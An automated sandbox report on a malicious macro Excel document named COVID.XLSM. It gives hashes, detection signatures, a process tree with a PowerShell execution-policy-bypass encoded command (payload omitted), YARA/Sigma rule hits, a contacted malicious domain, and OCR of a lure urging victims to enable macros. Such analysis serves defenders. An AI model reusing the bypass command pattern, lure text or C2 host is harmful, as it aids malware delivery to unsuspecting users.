Windows Analysis Report COVID.XLSM

Overview

General Information

Sample Name:COVID.XLSM
Analysis ID:471900
MD5:c123363068a4651c9c0c6b4e01b35142
SHA1:8de437d8df29c53e9ebb03a797fdbf805c10429a
SHA256:e5e65b70b5497f146609db5c086e997a4b0ab2352b534c9e25d8a10407801d78
Tags:xlsx

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Multi AV Scanner detection for domain / URL
Document contains an embedded VBA macro which may execute processes
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Very long command line found
Creates processes via WMI
Machine Learning detection for sample
Document contains an embedded VBA macro with suspicious strings
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Internet Provider seen in connection with other malware
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Potential document exploit detected (performs DNS queries)
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Potential document exploit detected (unknown TCP traffic)
Document contains embedded VBA macros
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 7044 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
  • cmd.exe (PID: 6408 cmdline: cmd.exe /c 'powershell -ExecutionPolicy BypasS -ENC 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' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • conhost.exe (PID: 6368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5860 cmdline: powershell -ExecutionPolicy BypasS -ENC [base64-encoded command omitted] MD5: 95000560239032BC68B4C2FDFCDEF913)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source: Process Memory Space: powershell.exe PID: 5860
Rule: PowerShell_Susp_Parameter_Combo
Description: Detects PowerShell invocation with suspicious parameters
Author: Florian Roth
Strings:
  • 0xf4e:$sa1: -ENC
  • 0x1ec5:$sa1: -ENC
  • 0x1519e:$sa1: -ENC
  • 0x195bd:$sa1: -ENC
  • 0x1a9f5:$sa1: -ENC
  • 0x57975:$sa1: -ENC
  • 0x58f67:$sa1: -ENC
  • 0x9c807:$sa1: -ENC
  • 0xc0e7e:$sa1: -ENC
  • 0xc8663:$sa1: -ENC
  • 0xc959d:$sa1: -ENC
  • 0x11cf92:$sa1: -ENC
  • 0x125c5d:$sa1: -ENC
  • 0x1a2c45:$sa1: -ENC
  • 0x250fd6:$sa1: -ENC
  • 0x2613c2:$sa1: -ENC
  • 0x2621b3:$sa1: -ENC
  • 0x2630c5:$sa1: -ENC
  • 0x157944:$sa2: -encodedCommand
  • 0x157970:$sa2: -encodedCommand
  • 0x15799f:$sa2: -encodedCommand

Sigma Overview

System Summary:

Sigma detected: Non Interactive PowerShell
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: powershell -ExecutionPolicy BypasS -ENC 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

Jbx Signature Overview

AV Detection:

Multi AV Scanner detection for domain / URL
Source: awmelisers.com; Virustotal: Detection: 7%
Source: https://awmelisers.com/api/v3/achyranthes/contrapolarization/kulturkreis; Virustotal: Detection: 7%
Source: https://awmelisers.com; Virustotal: Detection: 7%
Machine Learning detection for sample
Source: COVID.XLSM; Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE; File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000006.00000002.729401670.000002E1FB280000.00000004.00000001.sdmp
Source: global traffic; DNS query: name: awmelisers.com
Source: global traffic; TCP traffic: 192.168.2.4:49721 -> 206.81.23.172:443
Source: excel.exe; Memory has grown: Private usage: 1MB later: 82MB
Source: Joe Sandbox View; ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown; Network traffic detected: HTTP traffic on port 49721 -> 443
Source: powershell.exe, 00000006.00000002.728898346.000002E1FAE50000.00000004.00000001.sdmp; String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000006.00000002.725636008.000002E1F2B74000.00000004.00000001.sdmp; String found in binary or memory: http://nuget.org/NuGet.exe
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: powershell.exe, 00000006.00000002.714883789.000002E1E2D1E000.00000004.00000001.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000006.00000002.714589062.000002E1E2B11000.00000004.00000001.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: powershell.exe, 00000006.00000002.714883789.000002E1E2D1E000.00000004.00000001.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://api.aadrm.com/
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://api.addins.store.office.com/app/query
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://api.cortana.ai
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://api.diagnostics.office.com
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://api.diagnosticssdf.office.com
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://api.microsoftstream.com/api/
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://api.office.net
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://api.onedrive.com
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://apis.live.net/v5.0/
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://augloop.office.com
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://augloop.office.com/v2
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://autodiscover-s.outlook.com/
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: powershell.exe, 00000006.00000002.714883789.000002E1E2D1E000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.714589062.000002E1E2B11000.00000004.00000001.sdmp, PowerShell_transcript.675052.5LFBxafq.20210826072919.txt.6.dr; String found in binary or memory: https://awmelisers.com
Source: powershell.exe, 00000006.00000002.714883789.000002E1E2D1E000.00000004.00000001.sdmp; String found in binary or memory: https://awmelisers.com/api/v3/achyranthes/contrapolarization/kulturkreis
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://cdn.entity.
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://clients.config.office.net/
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://config.edge.skype.com
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: powershell.exe, 00000006.00000002.725636008.000002E1F2B74000.00000004.00000001.sdmp; String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000006.00000002.725636008.000002E1F2B74000.00000004.00000001.sdmp; String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.725636008.000002E1F2B74000.00000004.00000001.sdmp; String found in binary or memory: https://contoso.com/License
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://cortana.ai
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://cortana.ai/api
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://cr.office.com
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://dataservice.o365filtering.com
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://dataservice.o365filtering.com/
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://dev.cortana.ai
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://devnull.onenote.com
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://directory.services.
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://enrichment.osi.office.net/
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://entitlement.diagnostics.office.com
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: powershell.exe, 00000006.00000002.714883789.000002E1E2D1E000.00000004.00000001.sdmp; String found in binary or memory: https://github.com/Pester/Pester
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: powershell.exe, 00000006.00000002.725312158.000002E1E45EF000.00000004.00000001.sdmp; String found in binary or memory: https://go.micro
Source: powershell.exe, 00000006.00000002.728979309.000002E1FAEBD000.00000004.00000001.sdmp; String found in binary or memory: https://go.microsoft.co
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://graph.ppe.windows.net
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://graph.ppe.windows.net/
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://graph.windows.net
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://graph.windows.net/
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://incidents.diagnostics.office.com
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://lifecycle.office.com
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://login.microsoftonline.com/
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://login.windows.local
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://management.azure.com
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://management.azure.com/
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://messaging.office.com/
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://metadata.templates.cdn.office.net/client/log
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://ncus.contentsync.
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://ncus.pagecontentsync.
Source: powershell.exe, 00000006.00000002.725636008.000002E1F2B74000.00000004.00000001.sdmp; String found in binary or memory: https://nuget.org/nuget.exe
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://officeapps.live.com
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://onedrive.live.com
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://onedrive.live.com/embed?
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://osi.office.net
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://outlook.office.com/
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://outlook.office365.com/
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://pages.store.office.com/review/query
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://powerlift.acompli.net
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://roaming.edog.
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://settings.outlook.com
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://shell.suite.office.com:1443
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://skyapi.live.net/Activity/
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://staging.cortana.ai
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://store.office.cn/addinstemplate
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://store.office.com/addinstemplate
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://store.office.de/addinstemplate
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://store.officeppe.com/addinstemplate
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://tasks.office.com
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://web.microsoftstream.com/video/
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://webshell.suite.office.com
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://wus2.contentsync.
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://wus2.pagecontentsync.
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.dr; String found in binary or memory: https://www.odwebp.svc.ms
Source: unknown; DNS traffic detected: queries for: awmelisers.com

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 | Screenshot OCR: Enable Editing" to unlock the editing document c 7 8 9 0 Protected View This file originated fro
Source: Screenshot number: 4 | Screenshot OCR: Enable Content" to perform Microsoft Ofhce Decrypti 17 decryption of the document 1 18 19 20 0
Source: Document image extraction number: 0 | Screenshot OCR: Enable Editing' to unlock the editing document downloaded from the Internet ' il S Protected View
Source: Document image extraction number: 0 | Screenshot OCR: Enable Content" to perform Microsoft Office Decryption Core to start the decryption of the document
Source: Document image extraction number: 1 | Screenshot OCR: Enable Editing" to unlock the editing document downloaded from the Internet ' jJ C) Protected View
